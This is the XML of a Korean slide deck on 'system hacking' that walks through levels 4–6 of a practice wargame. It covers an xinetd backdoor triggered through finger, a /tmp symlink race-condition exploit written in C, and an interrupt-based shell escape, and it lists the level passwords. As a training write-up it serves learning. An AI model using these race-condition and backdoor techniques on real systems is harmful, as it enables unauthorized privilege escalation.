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3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0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2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9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4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6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8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1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3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E9BE-160A-4A5A-8725-BA6CE35770B4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2876-A600-4440-AAF5-2D3E7E21A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25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968DD-15A4-43F6-A955-3D52F9543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해킹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3743B-660C-4CDC-93A2-4AD93F9D8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4764"/>
            <a:ext cx="9144000" cy="593035"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2017.08.14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10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B2B48-3AF7-4458-930E-3C89ADA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68911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level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0"/>
              <a:t>4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en-US" altLang="ko-KR" sz="3600" dirty="0" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>백도어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EB591-8FB5-44EF-B1B4-2CF42F02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473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level4 / suck my brain</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ cat hint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ ls –al 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>xinetd.d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cat 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>/backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ cat 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/services | grep finger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>na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ls -al /home/level4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>/backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>로 이동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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>backdoor.c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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>stdlib.h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main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>		system(“my-pass”);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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> –o backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>backdoor.c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finger level4@localhost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00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B2B48-3AF7-4458-930E-3C89ADA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68911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level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0"/>
              <a:t>5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>레이스 컨디션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EB591-8FB5-44EF-B1B4-2CF42F02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4731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level5 / what is your name?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ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ cat hint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ find / -name level5 2&gt; /dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>/bin/level5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>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tmp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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>runTarget.c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# include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>unistd.h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main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>	{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	for(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&lt;=10;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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>		{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>			system(“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>/bin/level5 &amp;”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>		}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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>runTarget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runTarget.c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30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B2B48-3AF7-4458-930E-3C89ADA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68911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level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0"/>
              <a:t>5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>레이스 컨디션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EB591-8FB5-44EF-B1B4-2CF42F02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4731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$ vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>expTarget.c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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>unistd.h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main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>	{ 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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>		system(“touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>/lvl6pass.txt”);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for(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&lt;=10;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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>		{	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>			system(“ln –s /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>/lvl6pass.txt /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>/level5.tmp”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>		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system(“cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>/lvl6pass.txt”);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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>expTarget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expTarget.c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105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B2B48-3AF7-4458-930E-3C89ADA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68911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level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0"/>
              <a:t>5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>레이스 컨디션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EB591-8FB5-44EF-B1B4-2CF42F02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473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$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>expTarget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ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>tmp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./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>runTarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>expTarget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42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B2B48-3AF7-4458-930E-3C89ADA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68911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level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0"/>
              <a:t>6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>시스템 인터럽트의 위험성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EB591-8FB5-44EF-B1B4-2CF42F02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473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level6 / what the hell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ctrl + c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>–al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ cat hint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>$ cat password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cat .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>bashrc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9301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173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Theme</vt:lpstr>
      <vt:lpstr>시스템 해킹</vt:lpstr>
      <vt:lpstr>level 4 : xinetd 백도어</vt:lpstr>
      <vt:lpstr>level 5: 레이스 컨디션</vt:lpstr>
      <vt:lpstr>level 5: 레이스 컨디션</vt:lpstr>
      <vt:lpstr>level 5: 레이스 컨디션</vt:lpstr>
      <vt:lpstr>level 6: 시스템 인터럽트의 위험성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해킹</dc:title>
  <dc:creator>jisoo</dc:creator>
  <cp:lastModifiedBy>jisoo</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-13T12:55:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-15T16:39:27Z</dcterms:modified>
</cp:coreProperties>
</file>